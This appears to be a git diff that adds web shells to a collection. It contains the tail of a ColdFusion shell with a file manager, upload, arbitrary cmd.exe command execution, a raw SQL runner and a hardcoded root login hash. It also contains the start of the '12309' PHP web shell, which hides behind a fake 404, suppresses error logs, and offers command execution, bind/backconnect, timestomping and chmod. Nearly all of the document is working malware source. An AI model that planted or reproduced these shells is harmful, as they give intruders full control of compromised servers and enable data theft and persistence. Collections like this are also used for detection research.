+				<cfloop condition = "Right(deletedir, 1) neq '\'">
+					<cfset deletedir = #RemoveChars(deletedir, len(deletedir), 1)#>
+				</cfloop>
+				<cfset dirDelete('#scr#')>
+				<cflocation url="?action=goto&scr=#deletedir#" addtoken="No">
+			<cfelse>
+				<p>DeleteDir</p>
+			</cfif>
+			<a href="?action=goto&scr=#deletedir#" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- DeleteDir</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "new">
+		<!---
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfif FileExists("#scr#")>
+				<p>T&##7853;p tin #scr# &##273;&##227; t&##7891;n t&##7841;i.</p>
+			<cfelse>
+				<cfform name="articles" ENCTYPE="multipart/form-data">
+					B&##7841;n s&##7869; t&##7841;o th&##432; m&##7909;c m&##7899;i #scr#<cfinput type="text" name="namecreate" size="25" value=""> <input type="submit" value="Th&##7921;c hi&##7879;n" />
+				</cfform>
+				<cfif isDefined("namecreate")>
+					<cffile action = "write" file = "#scr##namecreate#" output = "">
+					<cflocation url="?action=goto&scr=#scr#" addtoken="No">
+				</cfif>
+			</cfif>
+			<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+		--->
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfdirectory action="list" directory="#scr#" name="fileList">
+			<script language="JavaScript" type="text/javascript">
+				var fileArray = new Array(<cfoutput>#quotedValueList(fileList.name)#</cfoutput>);
+				function sTrim(sVariable) 
+				{
+					return sVariable.replace(/^\s+|\s+$/g,"");
+				}
+				function validateFields(form)
+				{
+					var fileCount = 0;
+					var re = /.txt$|.cfm$|.cfml$|.htm|.html$/;
+					if (sTrim(form.fileName.value) == "")
+					{
+						alert('Can nhap ten tep');
+						form.fileName.focus();
+						return false;
+					}
+					if (form.fileName.value.search(re) < 0)
+					{
+						alert('Khong chap nhan tep loai nay!\n\n Chi chap nhan .cfm, .cfml, .htm, .html, va .txt!');
+						form.fileName.focus();
+						form.fileName.select();
+						return false;
+					}
+					for (var i=0; i<fileArray.length; i++) 
+					{
+						if (sTrim(form.fileName.value) == fileArray[i])
+						{
+							fileCount++;
+						} 
+					}
+					if (fileCount > 0)
+					{
+						alert('Ten nay da ton tai, vui long chon tep khac');
+						form.fileName.focus();
+						form.fileName.select();
+						return false;
+					}
+					return true;
+				}
+			</script>
+			<form action="?action=save&scr=#scr#" method="post" onsubmit="return validateFields(this);">
+				<input type="hidden" name="action_type" value="add" />
+				<table border="0" style="width:400px;">
+					<tr>
+						<td style="font-weight:bold;" nowrap="nowrap">
+							File name:  
+						</td>
+						<td>
+							<input type="text" name="fileName" style="font-family:verdana; font-size:11px; width:316px;" />
+						</td>
+					</tr>
+					<tr>
+						<td style="font-weight:bold;" nowrap="nowrap">
+							File content:  
+						</td>
+						<td colspan="2">
+							<textarea name="fileContent" style="font-family:verdana; font-size:11px; height:250px; width:600px;"></textarea>
+						</td>
+					</tr>
+					<tr>
+						<td colspan="2" style="text-align:right;">
+							<input type="submit" value="Save" style="font-family:verdana; font-size:11px;" />
+						</td>
+					</tr>
+				</table>
+			</form>
+			<a href="?action=goto&scr=#GetDirectoryFromPath(scr)#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "newd">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfform name="articles" ENCTYPE="multipart/form-data">
+				New dir: <cfinput type="text" name="namecreate" size="25" value="#GetDirectoryFromPath(scr)#"> <input type="submit" value="Create new dir" />
+			</cfform>
+			<cfif isDefined("namecreate")>
+				<cfdirectory directory= "#scr##namecreate#" action="create">
+				<cflocation url="?action=goto&scr=#scr#" addtoken="No">
+			</cfif>
+			<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "upload">
+		<cfoutput>
+		<cfif isDefined("scr")>
+			<cfform enctype="multipart/form-data" method="post">
+				Upload file to path:  <font color="red">#scr#</font><br>
+				Choose file: <input type="file" size="80" name="fileup" /> <input type="submit" value="Upload" /><br/>
+			</cfform>
+			<cfif isDefined("fileup")>
+				<cffile action="upload" fileField="fileup" destination="#scr#" nameconflict="overwrite">
+				<cflocation url="?action=goto&scr=#scr#" addtoken="No">
+			</cfif>
+			<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "cmd">
+		<cfoutput>
+		<cfif not isDefined("patch")>
+			<cfif FileExists("#GetDirectoryFromPath(GetTemplatePath())#cdm.exe")>
+				<cfset patch = "#GetDirectoryFromPath(GetTemplatePath())#cmd.exe">
+				<cfset out = "#GetDirectoryFromPath(GetTemplatePath())#out.txt">
+			<cfelseif FileExists("C:\windows\system32\cmd.exe")>
+				<cfset patch = "C:\windows\system32\cmd.exe">
+				<cfset out = "C:\windows\system32\out.txt">
+			<cfelseif FileExists("C:\winnp\system32\cmd.exe")>
+				<cfset patch = "C:\winnp\system32\cmd.exe">
+				<cfset out = "C:\winnp\system32\out.txt">
+			<cfelse>
+				<p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
+				<p>Khai b&##225;o bi&##7871;n patch l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p cmd.exe</p>
+				<p>Khai b&##225;o bi&##7871;n out l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p d&##7919; li&##7879;u</p>
+				<cfset sai = 1>
+			</cfif>
+		<cfelseif FileExists("#patch#")>
+			<cfset out = "#GetDirectoryFromPath(patch)#out.txt">
+		<cfelse>
+			<p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p>
+		</cfif>
+		<cfif not isDefined("sai")>
+			<cfform name="articles" ENCTYPE="multipart/form-data">
+				Enter command: <cfinput type="text" name="command" size="25" value=""> <input type="submit" value="Run" />
+			</cfform>
+			<cfif isDefined("command")>
+				<p>Results:</p>
+				<cfexecute name="#patch#" arguments="/C #command# > #out#" timeout="60"></cfexecute>
+				#ReadFile('#out#')#
+				#out#
+				<cfif FileExists("#out#")>
+					<cffile action="delete" file="#out#">
+				</cfif>
+			</cfif>
+		</cfif>
+		<br>
+		<a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfoutput>
+	<cfelseif action is "datainfo">
+		<cfoutput>
+		<cfdump var="#DataSoureceInfo#">
+		<a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfoutput>
+	<cfelseif action is "save">
+		<cfoutput>
+		<cfif isDefined("form.fileName")>
+			<title>&##272;&##227; l&##432;u t&##7879;p</title>
+			<cffile action="write" file="#scr#\#form.fileName#" output="#form.fileContent#" addnewline="no">
+			&##272;&##227; <cfif form.action_type IS "edit">s&##7917;a<cfelse>t&##7841;o</cfif> th&##224;nh c&##244;ng t&##7879;p <span style="font-weight:bold;">#form.fileName#</span>.<br>
+			<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		<cfelse>
+			<a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfif>
+		</cfoutput>
+	<cfelseif action is "sql">
+				<cfoutput>
+		<cfform name="articles1" ENCTYPE="multipart/form-data">
+			DataBase Name:
+			<cfif isDefined("database")>
+				<cfinput type="text" name="database" size="25" value="#database#"><br>
+			<cfelseif IsDefined("DS")>
+				<cfinput type="text" name="database" size="25" value="#DS#"><br>
+			<cfelse>
+				<cfinput type="text" name="database" size="25" value=""><br>
+			</cfif>
+			SQL query: <cfinput type="text" query="SQL" name="query" size="130" value=""><br>
+			<input type="submit" value="Th&##7921;c hi&##7879;n" />
+		</cfform>
+		</cfoutput>
+		<cfif isDefined("database") and isDefined("query")>
+			<cfquery name="SQL" DataSource="#database#">
+				#preserveSingleQuotes(query)#
+			</cfquery>
+			<br>
+			<table width="90%" border="1" align="center">
+				<tr><td align="center">M?u h?i: <font color="red"><cfoutput>#query#</cfoutput></font></td></tr>
+				<tr><td align="center">K?t qu? tr? v?:</td></tr>
+				<tr><td><cfdump var="#SQL#" format="text" label="Ket qua"></td></tr>
+			</table>
+			<br>
+		</cfif>
+		<cfoutput>
+		<a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a>
+		</cfoutput>
+	</cfif>
+<cfelse>
+	<cfset action = "goto">
+</cfif>
+<cfif action is "goto" or action is "del" or action is "deld">
+<cfoutput>
+	<center><a href="javascript:doMenu('thongtin');" id=xthongtin>[-]</a>Server info:</center>
+	<div id="thongtin">
+	<!--- Lay thong tin ip --->
+		<cfif #cgi.http_x_forwarded_for# eq "">
+			<cfset clientip="#cgi.remote_addr#">
+		<cfelse>
+			<cfset clientip="#cgi.http_x_forwarded_for#">
+		</cfif>
+	<!--- In thong tin server --->
+		<span>Server IP:</span> #CGI.HTTP_HOST#:#CGI.SERVER_PORT#</span> - <span>Client IP:</span> #clientip#<br>
+		<span>Gateway Interface:</span> #CGI.GATEWAY_INTERFACE# - <span>Server Name:</span> #CGI.SERVER_NAME#:#CGI.SERVER_PORT#<br>
+		<span>Server Protocol:</span> #CGI.SERVER_PROTOCOL# - <span>Server Software:</span> #CGI.SERVER_SOFTWARE#<br>
+		<span>Appserver:</span> #server.coldfusion.appserver# - <span>Expiration:</span> #DateFormat(server.coldfusion.expiration, "d/m/yy")# #TimeFormat(server.coldfusion.expiration, "HH:mm:ss")#<br>
+			<span>Product Name:</span> #server.coldfusion.productname# - <span>Product Level:</span> #server.coldfusion.productlevel# - <span>Product Version:</span> #server.coldfusion.productversion#<br>
+			<span>Server OS Arch:</span> #server.os.arch# - <span>Server OS Name:</span> #server.os.name# - <span>Server OS Version:</span> #server.os.version#<br>
+	</div>
+<hr>
+	<!--- Thu tao Object 
+		<cftry>
+			<cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">  
+			<cfcatch type="any">  
+				<cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">  
+			</cfcatch>  
+		</cftry>
+    --->		
+	
+<hr>
+<center><a href="javascript:doMenu('congcu');" id=xcongcu>[-]</a>Main:</center>
+<div id="congcu">
+	Path: #dir#<br>
+	Operations: <a href="?action=new&scr=#dir#">NewFile</a> - <a href="?action=newd&scr=#dir#">NewDir</a> - <a href="?action=upload&scr=#dir#" title="T&##7843;i l&##234;n m&##7897;t t&##7879;p t&##7915; m&##225;y t&##237;nh c&##7911;a b&##7841;n">Upload file</a> - <a href="?" title="Tr&##7903; v&##7873; th&##432; m&##7909;c ch&##7913;a Shell">---</a><br>
+	Actions: <a href="?action=cmd" title="Th&##7921;c thi l&##7879;nh Command Dos">CMD</a> - <a href="?action=sql&scr=#dir#" title="Th&##7921;c thi l&##7879;nh SQL query">SQL</a> - <a href="?action=datainfo" title="Th&##244;ng tin C&##417; S&##7903; D&##7919; Li&##7879;u">Datainfo CSDL</a>
+</div>
+<hr>
+<h1>File manager:</h1>
+<div id="thumuc">
+</cfoutput>
+<cfdirectory directory="#dir#" name="myDirectory" sort="type ASC" >
+<div class=content>
+<table width=100% class=main cellspacing=0 cellpadding=1><tr><th width='13px'><input type=checkbox class=chkbx name=ch11'></th><th>Name</th><th>Size</th><th>Modify</th><th>Chmod</th><th>Mode</th><th>Actions</th></tr>
+		<cfoutput>
+		<cfif len(dir) gt 3>
+			<tr>
+				<cfset updir = #dir#>
+				<cfset updir = #RemoveChars(updir, len(updir), 1)#>
+				<cfloop condition = "Right(updir, 1) neq '\'">
+					<cfset updir = #RemoveChars(updir, len(updir), 1)#>
+				</cfloop>
+				<th class=chkbx><input type=checkbox width='13px' class=chkbx></th><td width="20%"><strong><a href="?action=goto&scr=#updir#">..</a></strong></td>
+			</tr>
+		</cfif>
+		</cfoutput>
+                <cfset x=1>
+		<cfoutput query="myDirectory">
+                     <cfif x EQ 2> 
+ 			<tr class=l2><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
+                    </cfif>
+                   <cfif x EQ 1>   
+ 			<tr class=l1><th class=chkbx width='13px'><input type=checkbox class=chkbx></th>
+                    </cfif>
+                   <cfif x EQ 1>   
+                        <cfset x=2>
+                   <cfelse>
+                        <cfset x=1>
+                   </cfif>
+				<td>
+					<cfif #Type# is "Dir">
+						<a href="?action=goto&scr=#dir##Name#\"><b>[#Name#]</b></a>
+					<cfelse>
+                                                <a href="?action=edit&scr=#dir##Name#\">#Name#</a>
+					</cfif>
+				</td>
+				<td>
+					<cfif #type# is "Dir">
+						<Dir>
+					<cfelseif #Size# LT 1024>
+							#Size# B
+					<cfelseif #Size# LT 1024*1024>
+							#round(Size/1024)# KB
+					<cfelseif #Size# LT 1024*1024*1024>
+							#round(Size/1024/1024)# MB
+					<cfelseif #Size# LT 1024*1024*1024*1024>
+							#round(Size/1024/1024/1024)# GB
+					<cfelseif #Size# LT 1024*1024*1024*1024*1024>
+							#round(Size/1024/1024/1024/1024)# TB
+					</cfif>
+				</td>
+				<td>
+					#DateFormat(DateLastModified, "d/m/yy")# #TimeFormat(DateLastModified, "HH:mm:ss")#
+				</td>
+				<td>#Attributes#</td>
+				<td>#Mode#</td>
+				<td>
+					<cfif #Type# is "File">
+						<a href="?action=edit&scr=#dir##Name#">Edit</a>|<a href="?action=cut&scr=#dir##Name#">Cut</a>|<a href="?action=copy&scr=#dir##Name#">Copy</a>|<a href="?action=rename&scr=#dir##Name#">Rename</a>|<a href="?action=down&scr=#dir##Name#">Download</a>|<a href="?action=del&scr=#dir##Name#" onCLick="return confirm('Delete #Name# ?')">Delete</a>
+					<cfelse>
+						<a href="?action=cutd&scr=#dir##Name#\">Cutdir</a>|<a href="?action=copyd&scr=#dir##Name#\">Copy</a>|<a href="?action=renamed&scr=#dir##Name#\">Rename</a>|<a href="?action=deld&scr=#dir##Name#\" onCLick="return confirm('Delete #Name# ?')">DeleteDir</a>
+					</cfif>
+				</td>
+			</tr>
+		</cfoutput>
+	</table></div>
+</div>
+</cfif>
+<!--- End Main --->
+<cfelseif Not IsDefined("cookie.username")>
+	<cfform name="articles" ENCTYPE="multipart/form-data">
+		<center><table width="300" border="0">
+			<tr>
+				<td width="50">Username:</td>
+				<td width="50"><input type="text" name="username"></td>
+			</tr>
+			<tr>
+				<td width="50">Password:</td>
+				<td width="50"><input type="password" name="password"></td>
+			</tr>
+			<tr>
+				<td width="50">Remember you?:</td>
+				<td width="50">
+					<input type="checkbox" name="RememberMe" value="Yes" checked>
+					<input type="submit" name="Process" value="Login">
+				</td>
+			</tr>
+		</table></center>
+	</cfform>
+	<cfif IsDefined("username")>
+	<cfset member_username = "root">
+	<cfset member_password = "a619d974658f3e749b2d88b215baea46">
+	<cfif #username# neq #member_username#>
+		<center>Wrong username!</center>
+		<cfset structclear(cookie)>
+        <cfelseif hash(form.password, "MD5") neq #member_password#>
+		<center>Wrong password!</center>
+		<cfset structclear(cookie)>
+	<cfelse>
+    <cfif IsDefined("RememberMe")>
+	<cfset member_password1 = hash(form.password, "MD5")>           
+          <cfcookie name="username" value="#form.username#" expires="NEVER">
+          <cfcookie name="password" value="#member_password1#" expires="NEVER">
+    <cfelse>
+  	  <cfset member_password1 = hash(form.password, "MD5")>           
+          <cfcookie name="username" value="#form.username#">
+          <cfcookie name="password" value="#member_password1#">
+    </cfif>
+		<cflocation url="?" addtoken="No">
+	</cfif>
+	</cfif>
+</cfif>
+<!--- End Login --->
+<hr>
+</body>
+</html>
+
+
+
diff --git a/php/12309/12309.php.txt b/php/12309/12309.php.txt
new file mode 100644
index 00000000..3b50853f
--- /dev/null
+++ b/php/12309/12309.php.txt
@@ -0,0 +1,2066 @@
+<?php
+//th1s 1s ultr4l33t php websh3ll || uz3 1t f0r 3duc4t10n4l purp0zes 0nly :P
+if(isset($_GET['pfs'])) {
+ if(empty($_GET['path'])) {
+  $path="./";
+ } else {
+  $path=$_GET['path'];
+ }
+ findsock($path);
+}
+@session_start();
+if(isset($_REQUEST['l0g1n'])) {
+ $_SESSION['l0g1n']=session_id();;
+}
+if(!isset($_SESSION['l0g1n'])) {
+ header("Location: http://".$_SERVER['SERVER_NAME']."/404.html");
+}
+$ver="2.4";
+// --------------------------------------------- globals 
+@ini_set('display_errors',0);
+@ini_set('log_errors',0);
+@error_reporting(0);
+@set_time_limit(0);
+@ignore_user_abort(1);
+@ini_set('max_execution_time',0);
+$pageend='</body></html>';
+$htaccesses=array('cgi' => "Options +Indexes +FollowSymLinks +ExecCGI\nAddType application/x-httpd-cgi .pl .py", 'ssi' => "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml\nAddOutputFilter INCLUDES .shtml");
+if($_POST['action']!="") {
+ $_SESSION['action']=$_POST['action'];
+ $action=$_SESSION['action'];
+} else {
+ $action="viewer";
+}
+// download file or command execution result
+if($action=="download" or $_POST["down"]=="on") {
+ $download="1";
+}
+if ($download == "1") {
+ if (isset($_POST["file"])) {
+  header('Content-Length:'.filesize($_POST["file"]).'');
+ }
+ header("Content-Type: application/force-download");
+ header("Content-Type: application/octet-stream");
+ header("Accept-Ranges: bytes");
+ if (isset($_POST["filename"])) {
+  header('Content-Disposition: attachment; filename="'.$_POST["filename"].'"');
+ } elseif (isset($_POST["file"])) {
+  header('Content-Disposition: attachment; filename="'.$_POST["file"].'"');
+ } else {
+  header('Content-Disposition: attachment; filename="result.txt"');
+ }
+}
+@set_magic_quotes_runtime(0);
+@ini_set("magic_quotes_runtime", 0);
+// slashes fix by r00nix
+if (get_magic_quotes_gpc()) {
+ function stripslashes_deep($value) {
+  $value = is_array($value) ?
+   array_map('stripslashes_deep', $value) :
+   stripslashes($value);
+  return $value;
+ }
+ $_POST = array_map('stripslashes_deep', $_POST);
+ $_GET = array_map('stripslashes_deep', $_GET);
+ $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
+ $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
+}
+$descriptorspec = array(
+ 0 => array("pipe", "r"),
+ 1 => array("pipe", "w"),
+ 2 => array("pipe", "w")
+);
+$helpscript='function showTooltip(id)
+{
+ var myDiv = document.getElementById(id);
+ if(myDiv.style.display == "none"){
+  myDiv.style.display = "block";
+ } else {
+  myDiv.style.display = "none";
+ }
+ return false;
+}';
+$resizescript='function changeSize(elem){
+ if(event.keyCode==13){
+  elem.rows = elem.rows+1;
+ }
+ var oldrows = getrows(elem);
+ var myTxtAreaSize = elem.value.length;
+ var newrows = (myTxtAreaSize / 80 | 0)+1;
+ if(newrows>oldrows){
+  elem.rows = newrows;
+ } else {
+  elem.rows = oldrows;
+ }
+}
+function getrows(elem){
+ var text = elem.value.replace(/\s+$/g, "\n");
+ var aNewlines = text.split("\n");
+ var iNewlineCount = aNewlines.length;
+ return iNewlineCount;
+}';
+$design='function cleard() {
+ document.cookie="d=c; path=/;";
+ window.location.reload();
+}
+function blackd() {
+ document.cookie="d=b; path=/;";
+ window.location.reload();
+}';
+if ($_COOKIE['d'] != "c") {
+ $style='<style type="text/css">
+ a {
+  color: yellow;
+  text-decoration: none;
+  text-shadow: black 0px 0px 4px;
+ }
+ input {
+  background-color: #303030;
+  color: #73ba25; /* guess why */
+  border: none;
+ }
+ textarea {
+  background-color: #303030; 
+  color: #73ba25;
+  border: none;
+ }
+ input[type="submit"] {
+  background-color: gray;
+  color: white;
+ }
+ select {
+  background-color: black; 
+  color: yellow;
+ }
+ body {
+  background-color: black;
+  color: white; 
+ }
+ </style>';
+} else {
+ $style='';
+}
+if ($_COOKIE['d'] == "c") {
+ $button='<input type="button" value="black style" onclick="blackd()"></span><br><br>';
+ } else {
+ $button='<input type="button" value="clear style" onclick="cleard()"></span><br><br>';
+}
+$title='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- made by 12309 || cheerz to Tidus, Shift, pekayoba, Zer0, ForeverFree, r00nix and all people whose code i borrowed || exploit.in f0r3v4 -->
+<html>
+ <head>
+  <title>12309 '.$ver.'</title>
+  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'.$style.'</head><body><script type="text/javascript">'.$helpscript.''.$resizescript.''.$design.'</script><span style="float:left;"><form name="page" method="post" action="'.$_SERVER["PHP_SELF"].'"><input name="p" type="hidden" value=""></form><b><a href="#" onclick=\'document.page.p.value="f";document.page.submit();\'>file operations</a></b> || <b><a href="#" onclick=\'document.page.p.value="s";document.page.submit();\'>execute command</a></b> || <b><a href="#" onclick=\'document.page.p.value="b";document.page.submit();\'>bind/backconnect</a></b> || <b><a href="#" onclick=\'document.page.p.value="e";document.page.submit();\'>extras</a></b></span><span style="float: right;">'.$button.'';
+// --------------------------------------------- symbolic permissions 
+function fperms($file,$request) {
+ $perms = fileperms($file);
+ if (($perms & 0xC000) == 0xC000) {$info = 's';}
+ elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+ elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
+ elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
+ elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
+ elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
+ elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
+ else {$info = '?';}
+ if ($request == "string") {
+  $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+ } elseif ($request == "array") {
+  $o["r"] = ($perms & 00400) > 0; $o["w"] = ($perms & 00200) > 0; $o["x"] = ($perms & 00100) > 0;
+  $g["r"] = ($perms & 00040) > 0; $g["w"] = ($perms & 00020) > 0; $g["x"] = ($perms & 00010) > 0;
+  $w["r"] = ($perms & 00004) > 0; $w["w"] = ($perms & 00002) > 0; $w["x"] = ($perms & 00001) > 0;
+  return array("t"=>$info,"o"=>$o,"g"=>$g,"w"=>$w);
+ } else {
+  return "request?";
+ }
+}
+function view_perms_color($file) {
+ if (!is_readable($file)) {
+  return "<font color=red>".fperms($file,"string")."</font>";
+ } elseif (!is_writable($file)) {
+  return "<font color=white>".fperms($file,"string")."</font>";
+ } else {
+  return "<font color=green>".fperms($file,"string")."</font>";
+ }
+}
+// --------------------------------------------- touch file
+function touchz($file) {
+ $form=TRUE;
+ if (isset($_POST["touch_submit"])) {
+  $date=explode(" ",$_POST["time"]);
+  $day=explode("-",$date[0]);
+  $time=explode(":",$date[1]);
+  $unixtime=mktime($time[0],$time[1],$time[2],$day[1],$day[2],$day[0]);
+  if (touch($file,$unixtime,$unixtime)) {
+   $form = FALSE;
+   echo "<br>touched ".$file." to ".$unixtime." (".$_POST["time"].") <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a><br><br>";
+  } else {
+   echo "<br>can't touch to ".$unixtime." (".$_POST["time"].")! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a><br><br>";
+  }
+ }
+ if ($form) {
+  echo "<br><form action=\"".$_SERVER['PHP_SELF']."\" method=\"POST\">
+  <input type=\"hidden\" name=\"p\" value=\"f\">
+  <input type=\"hidden\" name=\"file\" value=\"".$file."\">
+  <input type=\"hidden\" name=\"action\" value=\"touch\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$_POST["dir"]."\">
+  touch ".$file." to: <input name=\"time\" type=\"text\" maxlength=\"19\" size=\"19\" value=\"".date("Y-m-d H:i:s",filemtime($file))."\">
+  <tr><td><input type=\"submit\" name=\"touch_submit\" value=\"Touch\"></td></tr>
+  </table></form>";
+ }
+ return TRUE;
+}
+// --------------------------------------------- chmod code from c99 shell, updated by 12309
+function chmodz($file) {
+ $check = fileperms($file);
+ if (!$check) {echo "<b>chmod error: can`t get current value!</b>";}
+ else {
+  $form=TRUE;
+  if (isset($_POST["chmod_submit"])) {
+   $chmod_o=$_POST["chmod_o"];
+   $chmod_g=$_POST["chmod_g"];
+   $chmod_w=$_POST["chmod_w"];
+   $octet=trim("0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8));
+   if (chmod($file,octdec($octet))) {
+    $form = FALSE; 
+    echo "chmoded ".$file." to ".$octet."! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a><br><br>";
+   } else { 
+    echo "can't chmod to ".$octet."! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a><br><br>";
+   }
+  }
+  if (isset($_POST["chmod_string"])) {
+   if (chmod($file,octdec($_POST["string"]))) {
+    $form = FALSE;
+    echo "chmoded ".$file." to ".$_POST["string"]."! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a><br><br>";
+   } else { 
+    echo "can't chmod to ".$_POST["string"]."! <a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$_POST["dir"]."'; document.reqs.submit();\">back</a><br><br>";
+   }
+  }
+  if ($form) {
+   $perms = fperms($file,"array");
+   echo "<br>chmoding ".$file.": ".view_perms_color($file)." (".substr(decoct($check),-4,4).") owned by: <br>".owner($file)."<br>
+   <br>input string: <form action=\"".$_SERVER['PHP_SELF']."\" method=\"POST\">
+   <input type=\"hidden\" name=\"p\" value=\"f\">
+   <input type=\"hidden\" name=\"file\" value=\"".$file."\">
+   <input type=\"hidden\" name=\"action\" value=\"chmod\">
+   <input type=\"hidden\" name=\"dir\" value=\"".$_POST["dir"]."\">
+   <input type=\"text\" name=\"string\" maxlength=\"4\" size=\"4\" value=\"".substr(decoct($check),-4,4)."\">
+   <input type=\"submit\" name=\"chmod_string\" value=\"Save\"></form>";
+   echo "<br> or select checkboxes:<br><form action=\"".$_SERVER['PHP_SELF']."\" method=\"POST\">
+   <input type=\"hidden\" name=\"p\" value=\"f\">
+   <input type=\"hidden\" name=\"file\" value=\"".$file."\">
+   <input type=\"hidden\" name=\"action\" value=\"chmod\">
+   <input type=\"hidden\" name=\"dir\" value=\"".$_POST["dir"]."\">
+   <table align=\"left\" width=\"300\" border=\"0\" cellspacing=\"0\" cellpadding=\"5\">
+   <tr>
+    <td><b>Owner</b><br>
+     <input type=\"checkbox\" name=\"chmod_o[r]\" value=\"1\"".($perms["o"]["r"]?" checked":"")."> read<br>
+     <input type=\"checkbox\" name=\"chmod_o[w]\" value=\"1\"".($perms["o"]["w"]?" checked":"")."> write<br>
+     <input type=\"checkbox\" name=\"chmod_o[x]\" value=1".($perms["o"]["x"]?" checked":"")."> execute
+    </td>
+    <td><b>Group</b><br>
+     <input type=\"checkbox\" name=\"chmod_g[r]\" value=\"1\"".($perms["g"]["r"]?" checked":"")."> read<br>
+     <input type=\"checkbox\" name=\"chmod_g[w]\" value=\"1\"".($perms["g"]["w"]?" checked":"")."> write<br>
+     <input type=\"checkbox\" name=\"chmod_g[x]\" value=\"1\"".($perms["g"]["x"]?" checked":"")."> execute
+    </td>
+    <td><b>World</b><br>
+     <input type=\"checkbox\" name=\"chmod_w[r]\" value=\"1\"".($perms["w"]["r"]?" checked":"")."> read<br>
+     <input type=\"checkbox\" name=\"chmod_w[w]\" value=\"1\"".($perms["w"]["w"]?" checked":"")."> write<br>
+     <input type=\"checkbox\" name=\"chmod_w[x]\" value=\"1\"".($perms["w"]["x"]?" checked":"")."> execute
+    </td>
+   </tr>
+   <tr><td><input type=\"submit\" name=\"chmod_submit\" value=\"Save\"></td></tr>
+   </table></form>";
+  }
+ }
+ return TRUE;
+}
+// --------------------------------------------- clearing phpversion() 
+function version() {
+ $pv=explode(".",phpversion());
+ if(eregi("-",$pv[2])) {
+  $tmp=explode("-",$pv[2]);
+  $pv[2]=$tmp[0];
+ }
+ $php_version_sort=$pv[0].".".$pv[1].".".$pv[2];
+ return $php_version_sort;
+}
+// --------------------------------------------- recursive dir removal by Endeveit
+function rmrf($dir)
+{
+ if ($objs = glob($dir."/*")) {
